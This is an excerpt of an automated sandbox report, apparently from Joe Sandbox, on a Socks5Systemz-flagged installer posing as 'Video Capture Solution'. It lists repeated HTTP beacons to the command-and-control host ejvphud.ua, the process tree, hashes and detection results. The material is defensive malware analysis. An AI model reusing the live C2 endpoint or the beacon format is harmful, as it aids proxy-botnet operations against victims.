                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:42.314868927 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:42.800298929 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.449852147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:43.040669918 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:44.551151037 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.449858147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:44.791974068 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:46.194381952 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.449861147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:46.432416916 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:47.807670116 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.449865147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:48.040822983 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:49.453177929 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:49.561417103 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:50.052721024 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.449870147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:50.291291952 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:51.727293015 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.449876147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:51.962718964 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:53.322369099 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.449881147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:53.557111025 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:54.934684038 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:55.045795918 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:55.522017002 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.449887147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:55.759183884 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:57.107979059 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20
                                                        Dec 16, 2024 14:53:57.218097925 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:57.706929922 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.449894147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:57.948272943 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:59.333841085 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.449897147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:59.572628021 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:54:00.963429928 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:54:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.449901147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:54:01.198599100 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:54:02.553124905 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:54:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.449907147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:54:03.299094915 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:54:04.619347095 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:54:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.449913147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:54:04.857968092 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:54:06.313155890 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:54:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.449917147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:54:06.560362101 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:54:07.976918936 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:54:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.449922147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:54:08.623197079 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:54:10.024416924 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:54:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.449926147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:54:10.264815092 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:54:11.688627958 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:54:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:08:52:03
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\AbC0LBkVhr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\AbC0LBkVhr.exe"
                                                        Imagebase:0x400000
                                                        File size:3'774'004 bytes
                                                        MD5 hash:038C7D5697BFBE553717357809E621BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:1
                                                        Start time:08:52:03
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe"
                                                        Imagebase:0x400000
                                                        File size:704'000 bytes
                                                        MD5 hash:2A520A4553D90F23218A97B9476D232A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2974303192.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 4%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Windows\SysWOW64\net.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\net.exe" pause video_capture_solution_11223
                                                        Imagebase:0x530000
                                                        File size:47'104 bytes
                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -i
                                                        Imagebase:0x400000
                                                        File size:3'281'038 bytes
                                                        MD5 hash:F980DB1C4941DE93EA4A88045D20F6D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1722687638.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 79%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Windows\SysWOW64\net1.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\net1 pause video_capture_solution_11223
                                                        Imagebase:0x5d0000
                                                        File size:139'776 bytes
                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:21%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:2.4%
                                                          Total number of Nodes:1498
                                                          Total number of Limit Nodes:22
